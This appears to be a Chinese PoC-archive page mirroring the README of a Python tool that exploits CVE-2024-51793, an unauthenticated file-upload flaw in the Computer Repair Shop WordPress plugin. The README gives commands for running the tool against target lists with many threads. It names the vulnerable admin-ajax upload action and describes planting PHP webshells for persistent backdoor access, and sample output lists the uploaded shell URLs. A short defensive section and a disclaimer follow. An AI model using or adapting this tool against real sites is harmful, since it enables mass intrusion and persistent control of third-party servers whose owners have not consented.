漏洞平台

POC详情： af1ba0692a01986437c111b927af2121210b13e4

来源

https://github.com/0axz-tools/CVE-2024-51793

关联漏洞

标题： WordPress plugin Computer Repair Shop 代码问题漏洞 (CVE-2024-51793)
描述：WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Computer Repair Shop 3.8115版本及之前版本存在代码问题漏洞，该漏洞源于包含一个危险类型文件上传不受限制漏洞。

介绍

CVE-2024-51793 Exploit Tool Documentation
📋 Overview
CVE-2024-51793 is an unauthenticated arbitrary file upload vulnerability in the Computer Repair Shop WordPress plugin (versions prior to 3.8116). This vulnerability allows attackers to upload arbitrary files, including PHP webshells, without authentication, leading to remote code execution on vulnerable WordPress sites.

🚨 Vulnerability Details
CVE ID: CVE-2024-51793

Vulnerability Type: Unauthenticated Arbitrary File Upload

Affected Plugin: Computer Repair Shop WordPress Plugin

Affected Versions: < 3.8116

Risk Level: Critical (CVSS Score: 9.8)

🔧 Technical Details
The vulnerability exists in the wc_upload_file_ajax action handler in the plugin, which fails to properly validate file types and user authentication, allowing unauthenticated attackers to upload malicious files directly to the server.

📦 Installation & Requirements
Prerequisites
Python 3.6+

Required packages: requests

Installation
bash
# Clone or download the script
git clone <repository-url>
cd cve-2024-51793-exploit

# Install required packages
pip install requests

# Or if you have requirements.txt
pip install -r requirements.txt
🛠️ Usage Guide
Basic Usage
bash
python3 cve_2024_51793_exploit.py -l targets.txt -t 50
Advanced Usage
bash
# With custom output directory
python3 cve_2024_51793_exploit.py -l targets.txt -t 100 -o results

# With verbose output (if implemented)
python3 cve_2024_51793_exploit.py -l urls.txt -t 50 --verbose
Command Line Arguments
Argument	Short	Description	Default
--list	-l	Path to file containing target URLs (required)	-
--threads	-t	Number of concurrent threads	50
--output	-o	Output directory for results	results
Input File Format
Create a text file (targets.txt) with one URL per line:

text
example.com
https://vulnerable-site.com
http://192.168.1.100/wordpress
test-site.org/blog
🔍 How It Works
1. Target Validation
The script first checks if the target is running the vulnerable plugin version by examining:

text
/wp-content/plugins/computer-repair-shop/readme.txt
2. Version Detection
It verifies the plugin contains "CRM WordPress Plugin" and the version is below 3.8116.

3. Exploitation
If vulnerable, the script uploads a PHP webshell via:

text
POST /wp-admin/admin-ajax.php?action=wc_upload_file_ajax
4. Webshell Payload
The uploaded webshell provides:

File upload capability

Basic file management

Persistent backdoor access

📊 Output Files
The tool generates two main output files:

vulnerable_targets.txt - List of confirmed vulnerable URLs

webshells.txt - List of successfully uploaded webshell URLs

🎯 Example Execution
bash
$ python3 cve_2024_51793_exploit.py -l targets.txt -t 30

    ╔══════════════════════════════════════════════════════════════╗
    ║                                                              ║
    ║  CVE-2024-51793 Exploit Tool                                ║
    ║  Unauthenticated RCE in Computer Repair Shop WP Plugin      ║
    ║                                                              ║
    ╚══════════════════════════════════════════════════════════════╝
    
 [ INFO ] Loaded 150 unique targets
 [ INFO ] Starting scan with 30 threads
 
 [ SCANNING ] Checking: http://example.com/
 [ VULNERABLE ] Target identified: http://example.com/
 [ SUCCESS ] Shell uploaded: http://example.com/wp-content/uploads/2024/05/3287428974_ktn.php
 
 [ SCANNING ] Checking: http://testsite.com/
 [ NOT VULNERABLE ] Target: http://testsite.com/
 
 [ COMPLETED ] Scan finished successfully
🛡️ Defensive Measures
For Website Owners
Immediate Actions:

Update Computer Repair Shop plugin to version 3.8116 or later

Remove any uploaded malicious files

Scan for existing compromises

Preventive Measures:

Implement web application firewalls (WAF)

Regular security audits

File integrity monitoring

For Security Researchers
Use only in authorized environments

Follow responsible disclosure practices

Obtain proper permissions before testing

⚠️ Legal & Ethical Considerations
This tool is for educational and authorized security testing only

Unauthorized use against systems you don't own is illegal

Always obtain proper authorization before penetration testing

Follow responsible disclosure practices for found vulnerabilities

🔄 Maintenance
Updates
Regularly check for:

Script updates and improvements

Changes in vulnerability status

New detection methods

Troubleshooting
Common issues and solutions:

Connection Timeouts: Increase timeout values in session configuration

False Negatives: Verify target URLs are accessible

Rate Limiting: Reduce thread count and add delays

📞 Support
For issues and improvements:

Create issues on the project repository

Contact: TG: @KtN_1990

📚 References
CVE-2024-51793 Official Entry

WordPress Plugin Directory

[Security Advisory References]

Disclaimer: This tool should only be used for legitimate security research and authorized penetration testing. The authors are not responsible for any misuse or damage caused by this tool.

文件快照


 [4.0K]  /data/pocs/af1ba0692a01986437c111b927af2121210b13e4
├── [10.0K]  CVE-2024-51793.py
└── [5.2K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。